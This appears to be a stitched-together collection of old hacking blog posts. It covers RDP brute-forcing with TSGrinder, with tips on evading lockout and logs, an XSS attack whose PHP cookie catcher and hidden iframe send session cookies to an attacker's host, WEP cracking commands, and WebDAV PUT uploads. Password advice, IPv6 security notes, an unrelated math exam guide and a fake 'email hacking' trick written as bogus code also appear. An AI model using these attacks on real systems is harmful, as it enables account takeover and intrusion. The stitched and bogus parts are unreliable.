tsgrinder

TSGrinder is a terminal server Brute Force tool. It uses dictionary attacks and has a very useful leet function. Given the leet file and dict file are weak to start with but that is easily remedied. If you run the command you will get the following.
c:\tsgrinder>tsgrinder.exe
tsgrinder version 2.03

Usage:
tsgrinder.exe [options] server

Options:
-w dictionary file (default 'dict')
-l 'leet' translation file
-d domain name
-u username (default 'administrator'
-b banner flag
-n number of simultaneous threads
-D debug level (default 9, lower number is more output)

Example:
tsgrinder.exe -w words -l leet -d workgroup -u administrator -b -n 2 10.1.1.1

The example demonstrates very well how to use this program. So for this example I will be attacking my server.

C:\tsgrinder>tsgrinder.exe -w dict -u administrator 192.168.2.1
password aaa - failed
password abc - failed
password academia - failed
password academic - failed
password access - failed
password ada - failed
password admin - failed
password adrian - failed
password adrianna - failed
password aerobics - failed
password airplane - failed
password password - success!

Once tsgrinder finds the password, it will output success and log off of mstsc. Since the dict file is weak, I recommend googling for a world list file. This will make life a lot easier. The leet file is also pretty weak by default. This is all it has:
l 1
e 3
t 7
s 5
Feel free to edit this by adding some more such as:
a @
o 0
etc.. I also recommend using the administrator account for these attacks, since by default it won't get locked out with so many password attempts. Also, if you noticed, tsgrinder will try 5 passwords, and then disconnects, and then reconnects, and trys 5 more. This is because a log entry won't appear until you get the password wrong on 6 consecutive attempts. This app won't throw a windows log file either. Now for the 1337. You just add the "-l" switch to the command.

C:\tsgrinder>tsgrinder.exe -w dict -l leet -u administrator 192.168.2.3
password academia - failed
password acad3mia - failed
password academic - failed
password acad3mic - failed
password access - failed
password acces5 - failed
password acce5s - failed
password acce55 - failed
password acc3ss - failed
password acc3s5 - failed
password acc35s - failed
password acc355 - failed

That shows you vaguely how it works. There is also the "-n" switch which allows more then 1 session. So with one session you are able to try 5 passwords in 10 seconds, but if you use "-n 2" you will be able to try 10 passwords in 11 seconds. I haven't tried more then 2 simultaneously connections since it does slow your computer down.

C:\tsgrinder>tsgrinder.exe -w dict -u administrator -n 2 192.168.2.3

XSS

Well I was testing my friends site for vulnerability and I found it was vulnerable to Cross Site Scripting. The environment I used it on was php forum. The first thing I needed to do was to see if the forum allowed user to run scripts to do this I made a new thread with the script
< script> alert("Do you work")</script>
in it. And well it worked! So the next step I made was to see if it was cookie based so in the url I put
javascript:alert(document.cookie)
and I got an alert with my cookies in it. So it's starting to look real good. So now you need a cookie catcher. It's a simple php script
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'< br > IP: ' .$ip. '< br > Date and Time: ' .$date. '< br > Referer: '.$referer.'< br > < br > < br >');
fclose($fp);
header ("Location: http://www.*******.com");
?>
So upload your php script to a php supported webhosting site. I used t35. Now you are going to make an iframe. You are going to want it small as possible for its not seen so I set height width and boarder to 0 you also want to set the document location to the location of your cookie catcher
< iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://********.t35.com/cookie.php?c="+document.cookie) </iframe >

Now when a user who is logged in browses to your thread you will catch his cookies in a document called cookie.html here is what the cookies looked like that I caught from my friends site
PHPSESSID=dqecpehg45ah5431f1q12p4pd1
So now you have someones cookies what do you do? Well first make sure you are logged out of the site. So now you inject there cookies into your browser you do this by typing the following in the URL
javascript:void(document.cookie="PHPSESSID=dqecpehg45ah5431f1q12p4pd1")
Hitting enter then refresh and you should be logged in as the user.A reason why this would not work is if the cookies are IP based meaning you need to have a certain IP in order to use those cookies.

WEP Cracking

This is a guide I wrote a couple years back as you can tell since secuirty auditor has been backtracks for over a year now. Most information holds true still.
Needed:
2 Prism 2/2.5/3 wireless cards
2 Computers running Security auditor

Key
# means channel number
PC means the AP’s client MAC address
AP means AP’s MAC address

Lets begin

Computer 1

Start up kismet

Press s to sort the AP’s

Press Enter on the AP your attacking get the following info
-Channel
-SSID
-BSSID

Press x to exit

Press shift + c get the following information
-PC

Exit kismet

Open terminal and run the following commands
Switch-to-hostap
Cardctl eject
Cardctl insert
Iwconfig wlan0 channel #
Iwpriv wlan0 hostapd 1
Iwconfig wlan0 mode master
Void11_penetration –D –s PC –B AP wlan0

Computer 2

Open terminal and run the following commands
Switch-to-wlanng
Cardctl eject
Cardctl insert
Monitor.wlan wlan0 #
Cd /ramdisk
Aireplay –I wlan0 –b AP –m 68 –n 68 –d ff:ff:ff:ff:ff:ff

You need a packet that looks like such
FromDS – 0
ToDS -1
BSSID – AP
SourceMAC – PC
Destination MAC – ff:ff:ff:ff:ff:ff

Click y to replay this ARP packet

Computer1

Since you got the above packet you can close void11

Open terminal and run
Switch-tp-wlanng
Cardctl eject
Cardctl insert
Monitor.wlan wlan0 #
Cd /ramdisk
Airodump wlan0 cap1

Once you get 100,000 IV’s exit for 64bit keys 800,000 for 128bit keys

Open terminal
Cd /ramdisk (key length)
Aircrack –f 2 –m AP –n 64/128 –q 3 cap*.cap

In a while you should have you WEP key

How I’d Hack Your Weak Passwords

If you invited me to try and crack your password , you know the one that you use over and over for like every web page you visit, how many guesses would it take before I got it?

Let’s see… here is my top 10 list. I can obtain most of this information much easier than you think , then I might just be able to get into your e-mail, computer, or online banking. After all, if I get into one I’ll probably get into all of them.

1. Your partner, child, or pet’s name, possibly followed by a 0 or 1 (because they’re always making you use a number, aren’t they?)
2. The last 4 digits of your social security number.
3. 123 or 1234 or 123456.
4. “password”
5. Your city, or college, football team name.
6. Date of birth – yours, your partner’s or your child’s.
7. “god”
8. “letmein”
9. “money”
10. “love”

Statistically speaking that should probably cover about 20% of you. But don’t worry. If I didn’t get it yet it will probably only take a few more minutes before I do…

Hackers, and I’m not talking about the ethical kind, have developed a whole range of tools to get at your personal data. And the main impediment standing between your information remaining safe, or leaking out, is the password you choose. (Ironically, the best protection people have is usually the one they take least seriously.)
One of the simplest ways to gain access to your information is through the use of a Brute Force Attack . This is accomplished when a hacker uses a specially written piece of software to attempt to log into a site using your credentials. Insecure.org  has a list of the Top 10 FREE Password Crackers right here .
So, how would one use this process to actually breach your personal security? Simple. Follow my logic:

• You probably use the same password for lots of stuff right?
• Some sites you access such as your Bank or work VPN probably have pretty decent security, so I’m not going to attack them.
• However, other sites like the Hallmark e-mail greeting cards site, an online forum  you frequent, or an e-commerce site you’ve shopped at might not be as well prepared. So those are the ones I’d work on.
• So, all we have to do now is unleash Brutus , wwwhack , or THC Hydra  on their server with instructions to try say 10,000 (or 100,000 – whatever makes you happy) different usernames and passwords as fast as possible.
• Once we’ve got several login+password pairings we can then go back and test them on targeted sites.
• But wait… How do I know which bank you use and what your login ID is for the sites you frequent? All those cookies are simply stored, unencrypted and nicely named, in your Web browser’s cache. (Read this post  to remedy that problem.)

And how fast could this be done ? Well, that depends on three main things, the length and complexity of your password, the speed of the hacker’s computer, and the speed of the hacker’s Internet connection.
Assuming the hacker has a reasonably fast connection and PC here is an estimate of the amount of time it would take to generate every possible combination of passwords for a given number of characters. After generating the list it’s just a matter of time before the computer runs through all the possibilities – or gets shut down trying.
Pay particular attention to the difference between using only lowercase characters and using all possible characters (uppercase, lowercase, and special characters – like @#$%^&*). Adding just one capital letter and one asterisk would change the processing time for an 8 character password from 2.4 days to 2.1 centuries.

Password Length	All Characters	Only Lowercase
3 characters 4 characters 5 characters 6 characters 7 characters 8 characters 9 characters 10 characters 11 characters 12 characters 13 characters 14 characters	0.86 seconds 1.36 minutes 2.15 hours 8.51 days 2.21 years 2.10 centuries 20 millennia 1,899 millennia 180,365 millennia 17,184,705 millennia 1,627,797,068 millennia 154,640,721,434 millennia	0.02 seconds .046 seconds 11.9 seconds 5.15 minutes 2.23 hours 2.42 days 2.07 months 4.48 years 1.16 centuries 3.03 millennia 78.7 millennia 2,046 millennia

Remember, these are just for an average computer, and these assume you aren’t using any word in the dictionary. If Google put their computer to work on it they’d finish about 1,000 times faster.
Now, I could go on for hours and hours more about all sorts of ways to compromise your security and generally make your life miserable – but 95% of those methods begin with compromising your weak password. So, why not just protect yourself from the start and sleep better at night?
Believe me, I understand the need to choose passwords that are memorable. But if you’re going to do that how about using something that no one is ever going to guess AND doesn’t contain any common word or phrase in it.
Here are some password tips:

1. Randomly substitute numbers for letters that look similar. The letter ‘o’ becomes the number ’0′, or even better an ‘@’ or ‘*’. (i.e. – m0d3ltf0rd… like modelTford)
2. Randomly throw in capital letters (i.e. – Mod3lTF0rd)
3. Think of something you were attached to when you were younger, but DON’T CHOOSE A PERSON’S NAME! Every name plus every word in the dictionary will fail under a simple brute force attack.
4. Maybe a place you loved, or a specific car, an attraction from a vacation, or a favorite restaurant?
5. You really need to have different username / password combinations for everything. Remember, the technique is to break into anything you access just to figure out your standard password, then compromise everything else. This doesn’t work if you don’t use the same password everywhere.
6. Since it can be difficult to remember a ton of passwords, I recommend using Roboform  for Windows users. It will store all of your passwords in an encrypted format and allow you to use just one master password to access all of them. It will also automatically fill in forms on Web pages, and you can even get versions that allow you to take your password list with you on your PDA, phone or a USB key. If you’d like to download it without having to navigate their web site here is the direct download link .
7. Mac users can use 1Password . It is essentially the same thing as Roboform, except for Mac, and they even have an iPhone application so you can take them with you too.
8. Once you’ve thought of a password, try Microsoft’s password strength tester  to find out how secure it is.

By request I also created a short RoboForm Tutorial . Hope it helps…
Another thing to keep in mind is that some of the passwords you think matter least actually matter most. For example, some people think that the password to their e-mail box isn’t important because “I don’t get anything sensitive there.” Well, that e-mail box is probably connected to your online banking account. If I can compromise it then I can log into the Bank’s Web site and tell it I’ve forgotten my password to have it e-mailed to me. Now, what were you saying about it not being important?
Often times people also reason that all of their passwords and logins are stored on their computer at home, which is save behind a router or firewall device. Of course, they’ve never bothered to change the default password on that device, so someone could drive up and park near the house, use a laptop to breach the wireless network and then try passwords from this list  until they gain control of your network – after which time they will own you!
Now I realize that every day we encounter people who over-exaggerate points in order to move us to action, but trust me this is not one of those times. There are 50 other ways you can be compromised and punished for using weak passwords that I haven’t even mentioned.
I also realize that most people just don’t care about all this until it’s too late and they’ve learned a very hard lesson. But why don’t you do me, and yourself, a favor and take a little action to strengthen your passwords and let me know that all the time I spent on this article wasn’t completely in vain.
Please, be safe. It’s a jungle out there.

Banner Grabbing

In more boredom I figured I will just do something easy and simple and usually over looked. We are going to use netcat to do some http server banner grabbing.

# nc 12.200.x.x 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 230
Content-Type: text/html
Content-Location: http://10.1.1.120/WebInterface.htm
Last-Modified: Sat, 29 Mar 2008 16:03:16 GMT
Accept-Ranges: bytes
ETag: "569b6d66b691c81:1d8a"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 22 Jun 2011 14:07:14 GMT
Connection: close

Just for the record Head requests can be spoofed.

So we connect on port 80 and issue a head request.
We have the internal IP address which here is 10.1.1.120 When I see a class A IP address for an Internal network I usually guess they are using CIDR. Since the rule of thumb is not to have more then 500 hosts per subnet. So I'm guessing 10.1.1.0/24

Next It tells us they are using IIS6 which is either Server 2003 or XPx64

Next we will see what options are available to us. By using.

Options / HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Date: Wed, 22 Jun 2011 14:15:15 GMT
X-Powered-By: ASP.NET
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL:
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, PUT, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Cache-Control: private

From here we can see what commands are available to us and PUT is available I believe this is a very underutilized method. So next we can put a file up be it malicious what not. Here is my file.

# cat 1.txt
blah

So next you have to see how big the file is.
#wc -m 1.txt
5 1.txt(5bytes)

#nc 12.200.x.x 80
PUT /1.txt HTTP/1.0
Content-type: text/html
Content-length: 5

Some servers will give you a status message and some will not.



Just for examples of what you can do, you can make a php script to run commands and through this you can change root/admin passwords if there are multiple services on the computer lets say rdp or ssh you can get an actual session on the victim. This is an old exploit but it is still valid today against miss configured servers and in my opinion should not be over looked.

Researchers crack SSN Algo(Social Security Number Algorithm)

Social Security numbers have a predictable pattern, according to Carnegie Mellon University researchers, who have developed a reliable method of cracking a person’s SSN based on data gleaned from multiple sources, including profiles on social networking sites.

The researchers cracked the algorithm, guessing the first five digits of a SSN on the first try for 44% of people born after 1988. The method is even more reliable with a 90% success rate of cracking SSNs of individuals born after 1988 in less populated states. In fewer than 1,000 attempts, the researchers could identify a complete SSN in 8.5% of those born after 1988, “making SSNs akin to 3-digit financial PINs.”

Mastering Mathematics for hacking basics

For mastering hacking to the core, your mathematics skills should be perfect. In this article, I present you some facts required for mastering mathematics using a simple example of how to crack the IIT-JEE mathematics paper. You may wonder whats the connection between IIT-JEE and hacking? In a recent study conducted by appin, best hackers in India hail from IIT’s. This is an embed to educate people how the IIT’ians think about mathematics. Goal is to get the basics right.

“I have practiced more questions than others, still I score less. Can you tell me why?” This is a common question students ask after any Mathematics paper. The answer to this question lies in the fact that practice does make perfect, but the assumption is that you practice the right set of questions, and do them correctly while practicing as if you were giving the actual paper.

There are some interesting facts about pattern of Mathematics examinations in IIT-JEE. For example, in the year 1996, the exam had really simple questions but it was lengthy. In this examination scenario, rarely would a person complete such an exam and thus the success would lie in an individual’s ability to select the set of questions that would need minimum time and fetch maximum marks. However in the year 2000, the exam had only 10 questions, with each question having 2 parts where, although not mentioned explicitly, the result of 1st part was used in 2nd in all questions. Students who didn’t identify this fact had a touch time in attempting the 2nd part and wasted a lot of time. Taking another instance, in the year 2001, the examination level was moderate. Examination had a good mix of simple and tricky questions. A person with cool mind with an ability to identify the simple questions would generally perform well in it. In case someone attempted the tricky ones, they might get discouraged and may not be able to attempt the easier ones as well. I strongly recommend you to solve previous year papers and identify their patterns while solving. This will help you in identifying the patterns of examinations that come, revising concepts and creating an exam like atmosphere during practice.

There are also certain tips I will pitch in for certain topics There are several problems that can boggle a student in Quadratic Equations. My recommendation for students is to draw a graph of all possible cases of a quadratic equation to get a mental picture of the problem. Let’s try to draw the graph of

2 x^2 + ax+ 2 =0

• The coefficient of x^2 is 2 >0 thus the graph opens upwards
• Discriminant D = a ^ 2 -16. Assuming real roots, D>= 0 for a>= 4 or a<= -4 which implies that the lowermost point of graph intersects the axis under these conditions.
• For complex roots, the lowermost point is above X-Axis.
• Intersection with Y –Axis can be found out by putting x=0, comes out to be y=2.

Thus within half a minute or a minute you will be able to visualize the whole problem.

Certain other topics like Progressions, Logarithms, and inequalities keep on coming either as a part of a bigger question or as short questions. You need to revise these topics as they are generally simple and form part of bigger questions, and without understanding them thoroughly, you may lose out on a simple big question. It may seem basic to many students, but many often get confused between log (to the base 10) and ln (to the base e) during the IIT-JEE examination. This kind of sensory acuity during the exam again requires one to maintain a cool head during exam and loads of practice to embed these in one’s nervous system as opposed to just doing it once or twice.

You can also revise formula of logarithms right now. The formula mentioned below are good enough to solve most of the problems in logarithms. You can also try out some problems in logarithms using these formula

Integral calculus is a very important chapter and you need to try right methods while solving a question. It may seem very basic to you but I have seen people solving the problems in following ways:

∫ tanx dx = ∫ (Sinx / Cosx) dx = (∫sinx dx) / (∫ cosx dx)

This is absolutely wrong, as although you could have taken a similar approach in Differentiation, you can’t do the same in Integration. So beware of these disastrous mistakes as they might cost you selection, don’t ignore them as silly mistakes. All the formula of integral calculus need to learn t and applied in a very structured manner. This is necessary when you practice questions towards the end, as the way you apply them during practice will be the way you will apply them in your exam.

The science of Neural Linguistic Programming has come out with bright techniques to remember formula. One important technique to remember the formula is to place right eye in the upper right position. This accelerates visualization of the formula. In fact I used to learn all formula using this technique. For example – In coordinate Geometry I used to first visualize the figure say a circle and then I used to mug up all formula by visualization. This not only prevented confusion among different formula but also helped in fast retrieval.

At the same time you can use a small trick. Problems in which you want to prove questions you can work the solution other way round. For example, in case you know that you need to prove a result, you can assume the result and backtrack to see if the premise or the assumptions hold true. For example – If you are given the following problem: a>4, prove that the graph of equation: 2 x^2 + ax+ 2 =0 intersects X-Axis twice, you can solve this problem by assuming that the equation has real unequal roots (implying intersection) and find assumption when the statement is true (a>4).

Generally the topic Complex numbers is considered tough. There are many problems in Complex Numbers which become the easiest in Coordinate Geometry and Vectors. Remember, you can always imagine a complex number as a 2-D Vector.

In the end I will like to mention few check points:

• On solving a problem, learn its technique as well as similar problems that can be solved using same technique.
• Learn all formula in a structured way keeping in mind the kind of questions that use them.
• Practice previous year papers and understand their psychology.
• During the examination identify the pattern of examination and perform accordingly.
• Enjoy Life and Relax

IPSec in IPv6

The description about what is IPSec and why it is important along with description of why IPv6 is considered to be better than IPv4 in terms of security and brief description of other features and discuss why it should be considered at the same level with IPv4 when it comes to security. Also paper will give some new threats presented on IPv6 apart from the common threats like DoS attacks, Flooding, Man In Middle Attack (MIMA), Application layer attacks, Rogue Attacks which are prevalent in IP network using IPSec protocol

1) What is IPSec?

IPSec is an Internet security protocol integrated into Layer 2 that is network layer to secure the network from the unauthorized users. It uses following services to authenticate user at the senders and receivers end.

Origin Authentication (AH) – The sender is authenticated by the receiver to check for the validity of the sender.
Data confidentiality (ESP) – Data is encrypted before being sent to the receiver
Data Integrity (SPI) – Data is authenticated to check for errors before the receiver can actually process it.

Diagram below shows fields in IPSec architecture

IPSec is the effort in providing security to Internet, by using the above shown mechanism. Being a common layer to all the upper layer protocol, Internet layer is most likely to be attacked by the attacker in order to gain control over the network or to sniff into the upper layer protocol. The layout of the TCP/IP protocol makes IP layer more important and hence the security of the IP layer (Network layer) the first priority for the network of any organization.

2) Why do we need IPv6?
For many years IPv4 has been in use and website which we see nowadays are based on the IPv4 address allocation scheme, but as the time went by number of website on the internet went on to increase, and the address for this websites were not being fulfilled by IPv4 address allocation scheme as expected, so there was a need for the Internet Address allocation scheme that could render many addresses and yet not get exhausted.

The original IPv4 is a 32-bit address which is divided into four octets of Eight bits each and consisting of 4 classes to give suitable address allocation scheme. The figure below shows IPv4 structure

A.B.C.D -> where A, B, C, D each has 8-bits and each bit having value of either 0 or 1

This gives us the maximum address space of 2^32.

However in IPv6 address allocation scheme there are 128 bits and each having value of either 0 or 1 which gives around 2^128 addresses which makes it possible to address every single individual on the earth with more than 10-address for each person.

Of course, this was necessary looking at the IPv4 public addresses nearly coming to an end.

3) Is IPv6 more secure than IPv4?

Other features about the IPv6 addressing scheme as drafted in IETF paper on IPv6 is that it has better security than its ancestor, lets take a look at some of the remarks of what experts have to say about IPv6 in terms of security.

“IPv6 mandates the inclusion of IP Security (IPSec), it has often been stated that IPv6 is more secure than IPv4”

The contradictory statement as mentioned below totally neglects the possibility of mandatory inclusion of IPSec in IPv6, which is as follows

“IPSec was a required element in 1995 draft of IPv6 which was then dropped during revised draft in 1998”

The reason for dropping IPSec during revised draft in 1998 was that if implemented mandatory it wouldn’t have supported real-time application like VoIP and video conferencing. However this does puts the IPv6 in the same category as IPv4 in terms of security.

Above two statements remains the point of argument yet, it cannot be concluded that is it compulsory to include IPSec in IPv6 or not. But, the reason mentioned in above paragraph can limit the mandatory inclusion of IPSec in IPv6 and which I think is the real case and the most practical thing a network administrator will like to do to get real and efficient network.

This paper presents the description about why IPv6 is considered to be better than IPv4 in terms of security along with brief description of other features and discuss why it should be considered at the same level with IPv4 when it comes to security. Also paper will give some new threats presented on IPv6 apart from the common threats like DoS attacks, Flooding, Man In Middle Attack (MIMA), Application layer attacks, Rogue Attacks which are prevalent in IP network using IPSec protocol.

(The above terms are derived from)

4) Why IPv6 is considered to be better than IPv4?

IPv4 has been a bit of nightmare when it comes to number of addresses available and management of the address. The newer IP protocol addresses this limit very nicely, which has very large number of networks host address available.
IPv6 is a 128 bit address with 64bit reserved for the subnet, which means in all there are more than 10 addresses for each person on the earth. The numerical value of this address ranges up to around 3×10^38 addresses. Whereas, number of IPv4 address in public domain has nearly come to an end.

Also, the implementation of IPv6 will reduce the burden of managing the addresses on administrator since it has the capability to automatically configure the address based on the type of connectivity. Apart from these there are number of more advantages like IPv6 provides better Quality of Service (QoS), it helps in Multicasting, and it does significantly reduce number of fields in IP header and simplify IP protocol. However the basic need for today’s IP infrastructure is security wherein lots of transactions are taking place online. It is because of security concerns that most of user hesitate to buy online or carry out business online. Whereas one of the advantages listed in IPv6 and rolling out the idea of IPv6 address format was that it has got better security than its predecessor IPv4.

4.1) In terms of Security

NAT also known as Network Address Translator is an end device used in an organization in order to connect to the internet. It converts private address of an organization into public domain as shown in figure-3 below. NAT is widely used in IPv4 environment where there is a need to conserve addresses due to shortage of address in public domain. However presence of NAT device makes organization vulnerable to many attacks as Denial of Service, since end-to-end security mechanism such as encryption cannot be employed effectively as packet traveling to and fro from private network has to be tunneled into IP packets with address of NAT device and even if security mechanism using IPSec protocol is employed it will be ineffective as the IP packets has to be tunneled into other packet with address of NAT device.

As DeNardis in her paper stated that Absence of NAT, facilitates the use of end-to-end security mechanism like encryption
The above statement reflects the way how the IPv6 header is configured to automatically acquire IP address and also the never ending pool of addresses available in public domain that facilitates a real end-to-end communication. The advantage of this method of communication is that a real end-to-end security mechanism like encryption can be employed, and implementation of IPSec in such an environment will give the benefit of services like authentication, confidentiality and integrity. This is unlike in IPv4 wherein NAT devices play a vital role in organizations networks and also to conserve the number of IP address available in public domain.

Well NAT is fine when it comes to management of IP address, but the problem is compromising security to the end users. Since packets intended for the Public network from the Private network has to pass through NAT device, which alters the source IP address in the IP header, makes the implementation of IPSec protocol virtually unimportant. The device at the receiver end on detecting the changed IP address will discard the packet. However there are ways like NAT-T and NAT-D which helps in protecting the IP packets in presence of NAT.

When looking at IPv4 and IPv6 addressing protocol from this point IPv6 seems to have an edge over IPv4 if it has compulsory inclusion of IPSec, but a bit deep insight into today’s modern day application needs like VoIP and Video Conferencing wouldn’t be as much a success as it is for today’s network which doesn’t use IPSec protocol as it gives delays in transmitting packets over IP. The true point worth noting is that real-time applications like VOIP and Video conferencing is not possible in such an environment along with security of the network, either of security or real-time solutions for the above mentioned applications have to be sacrificed. Since, end-to-end communication becomes possible in IPv6 environment security mechanism along with real time applications will become possible but this doesn’t guarantee that it has better security. This argument supports DeNardis statement that IPSec protocol is an optional field in IPv6. (Term real-time application means application which requires no-delay)

IPSec protocol which was developed during the draft of IPv6 is embedded in the IPv6 header which makes it possible to avail the services like Authentication and Encapsulation. The Extension header field in IPv6 can contain Authentication Header (AH) and Encapsulation Security Payload (ESP), which can provide security to upper layer protocols. During the initial draft of IPv6, Authentication Header and Encapsulation Security Payload where considered to be mandatory, but during revised draft in 1998 [8], inclusion of AH and ESP fields were made optional. However the best practice of incorporating security into networks makes IPv6 more secure. Although there are few disadvantages of incorporating security in end-to-end communication when it comes to applications requiring real time delivery, it still stands out better when compared to using NAT device which makes security mechanism ineffective.

4.2) Why IPv4 and IPv6 are equivalent when it comes to security?

The security mechanism which was designed for IPv6 is and more often induced in IPv4 protocols optional fields. Since neither of them mandatory implements IPSec protocol in their basic infrastructure, none of them can be considered to be superior to each other. Mandatory inclusion of IPSec in IPv6 would have made it better than IPv4 but this is not the case and IPSec implementation remains optional depending on the security policy of the organization.

As DeNardis in her paper on Exposing IPv6 Security stated that if IPSec is the element which improves the security of IPv6 than IPv4 has the same security mechanism which uses IPSec and hence both should be treated as equivalent.
With reference to  and , implementation of IPSec remains same in both the protocols. Authentication Header (AH) and Encapsulation Security Payload (ESP) are the basic parameters in IPSec which can be easily incorporated in IPv4 and IPv6 protocols. There are various ways to implement IPSec in IPv4 and IPv6 like Transport Mode and Tunnel Mode. For details on how to implement is not in the scope of this topic, please refer to RFC2406 and RFC2408 on implementation of IPSec in Transport Mode and Tunnel Mode.

Until, now what has been discussed it can be concluded that IPv6 is not more secure than IPv4, but in fact it carries the risk of some newer threats which makes it much less secure than IPv4. Internet Security protocol has been prone to many attacks like Denial of Service, Spoofing, Flooding, Man In Middle Attack (MIMA) in past, while IPv6 with its new architecture can invite some new attacks apart from previously mentioned threats.

Sean Convery and Darrin Miller , on their paper on IPv4 and IPv6 Threat Comparison and Best Practice Evaluation (v1.0), identified few of the new threat in IPv6 which are as follows

· Reconnaissance
· Unauthorized access
· Header manipulation and fragmentation
· Layer 3 and Layer 4 spoofing
· ARP and DHCP attacks
· Broadcast amplification attacks
· Routing attacks
· Viruses and worms

Discussing every threat will exceed the limitation of these paper hence remaining part will discuss some of the important threats like Reconnaissance and Routing Attacks and what impact the technology differences could have on these sort of attacks.

5) Reconnaissance

Literally reconnaissance means gaining as much as information about someone and in terms of networking it means passive mode of attack to gain information about the network infrastructure of organization. It is a first step of attack used in any of the active attacks like DoS, MIMA etc. wherein the attacker searches for any active host and port in network.

With respect to IPv4 there are only 255 addresses to scan when Class-C address is used and it takes around 30 seconds to identify the active host and port whereby the attacker exploits the ARP cache of that host to gain information about the network. There are many ping sweep tools like NMAP which can easily identify active host in the network and flood the victim with ping echo requests.

With respect to IPv6, this mode of attack becomes almost impossible as there is numerous numbers of hosts in a subnet. According to the address format of IPv6, there are about 2^64 which varies as per subnet giving value of around 1.8×10^19 addresses which when scanned at modern processing speed will take around 28 years to reach identify active host. Also there no known ping sweep tools like NMAP which facilitates active scanning of device and port for IPv6.

However attacker on other side are smart enough to overcome this difficulties, and due to the technology used in IPv6 active host can be easily identified based on the following criteria.

1) Auto configuration mode for IPv6 discourages administrators to use DHCP and DNS server which mean that every host on the network should be given a valid DNS name in order for an administrator to help manage network. Since remembering host names such as FE80:0:0:0:202:B3FF:FE1E:8329 would require lot of effort administrator will use easy to remember names such as FE80:0:0:0:202:B3FF:FE1E:0BAD, attacker can easily launch dictionary attack and identify the active host addresses.

2) Most of the network that will exist for the years to come will be based on dual mode using both IPv4 and IPv6 addresses whereby administrator will tend to use single address for IPv4 and IPv6 network which will be like mapping 32 bits of IPv4 address into last 32 bit of IPv6 hex mode addresses this will make address scanning more easier.

3) Most importantly as stated in which tend to make use of new multicast addresses for key devices like Routers (FF05::2) and DHCP (FF05::3) servers, gives attacker an idea about the key devices in network. Attacker can then use ping sweeps attack to choke the network and other methods to hack the key devices to employ attacks such as Route Redirection.

Attacker would like to take advantages of the above three vulnerabilities in IPv6 addressing technology to gain information about victims network by exploiting NS-ND (Neighbor Solicitation and Neighbor Discovery) cache of the host to gain knowledge about the victim network. And if the router is badly configured for security there will risk of other mode of attacks like Denial of Service (DoS) once the attacker knows about the victims network

However this mode of attack will be quite difficult to implement in IPv6 environment than in IPv4 environment but what is important that this mode of attack is still possible in IPv6 no matter how much big the address space is and if IPv6 is used in dual mode with IPv4 it will be more open and I think this will be scenario for years to come.

6) Viruses and Worms
Viruses are not at all impacted by the implementation of IPv6, whereas worm finds it difficult to find active users and ports thus IPv6 make out better when it comes to threats from viruses and worms. Traditional viruses are not at all concerned about what protocol is being used at layer-3 since virus can be packed in email and send to anywhere with valid host address.

However these sort of threat is same when it comes to IPv4 but what is worth noting is that since most of the administrator will hesitate to employ NAT devices and other devices like DHCP servers it will be more difficult to implement security covers for organization as whole and this will be concern for users who don’t have virus protection software on their laptop or personal computers. However advantage of using IPv6 will be that worm will find it difficult to propagate but downside will be that since key device in the network like routers will be easily identifiable from the IPv6 address, attackers will make every effort to target such devices with worms which will cause significant network downtime.

7) Conclusion

Now that from what I have discussed, what is exactly IPSec and on what makes vendors say that IPv6 is better in IPv4 in terms of security, having identified various loopholes in the implementation of IPv6 and threat from implementation of new technology what impact will it have on the most networks remains a question to be answered. However from what I have discussed in this paper I would say that IPv6 is not as good a technology as it is popularize when the term security is associated with it. Some key threats are presented in this paper which were also threat in IPv4 but only the technology difference have made some of the threats easier to propagate while some threats find it difficult to enter network.

However this is just beginning of implementation of IPv6 networks but there are remarkable number of fears that needs consideration which were not given importance when IPv6 was drafted as IPng (which was later known as IPv6) during 1995 draft specification. IPSec does satisfy the security mechanism employed in both Internet protocols, however IPSec cannot be considered as the only driving point in implementation of IPv6 as it is also used in IPv4. however the only known advantage of using IPSec in IPv6 is that it will make scanning of active host more difficult but not impossible. Remaining part of destroying victim will remain almost same and hence both protocols should be given equal respect when security is questions.

The security implementation in IPv6 network remains at the hand of administrator and experience of configuring secure network. For time being and few years to come implementation of IPv4 and IPv6 in dual mode for network will be a better option. The real advantage of IPv6 will actually be seen when it will be implemented globally with hope that no new software comes up that could defeat IPv6 networks. Much will rest on the end user how he/she wants to implement security.

SSH key compromise shuts down Apache website

The Apache website was taken offline for several hours after attackers used a SSH key to access one of its servers.
Apache shut down all its machines as a precaution and switched over to an unaffected European mirror server. On its blog, the Apache Infrastructure TeamApache said it did not believe any end-users or downloads of enormously popular Web server software were affected. The blog also said that the attackers failed to escalate privileges.
Apache stressed that the attack was the result of the compromised SSH key, not an exploit of Apache software. It said it was conducting an audit of all affected machines.
On Thursday, the key was used to access an account used for automated backups for the ApacheCon website. The attackers created several files, including CGI scripts which they used to launch rogue processes this morning on Apache’s production Web services.
There was no information on how the attackers were able to get the SSH key. In 2001, an attacker was able to compromise SSH on SourceForge and tunnel to the Apache site when an Apache developer logged into his SourceForge account.

case study- Email Hacking

Email Hacking

Here we shall study few case studies on how to hack email IDs by means of Social Engineering. If this method is used cleverly then the hacker will be able to retrieve anyone’s email password. Well, in this method the hacker tries to motivate the victim by various means to fall into the trap. I shall describe various case studies in which the hacker tries to motivate the victim to retrieve his/her E-mail ID password.

Case Study 1

Below given is a clever trick, where the hacker has tried to social engineer any victim to retrieve his/her yahoo passwords.

Hacking yahoo is as easy as sending an E-mail.

Have you ever asked for your password from Yahoo? This system confuses that same system.

By simply emailing retrieve_pwd_yh@yahoo.co.uk this

var return[snd_mail] = your email@yahoo.com;

var enterpass_md5 = yourpass;

Fcn7662Nc2A_md5encryp_get_pass(TheIDofthepassyouwant);

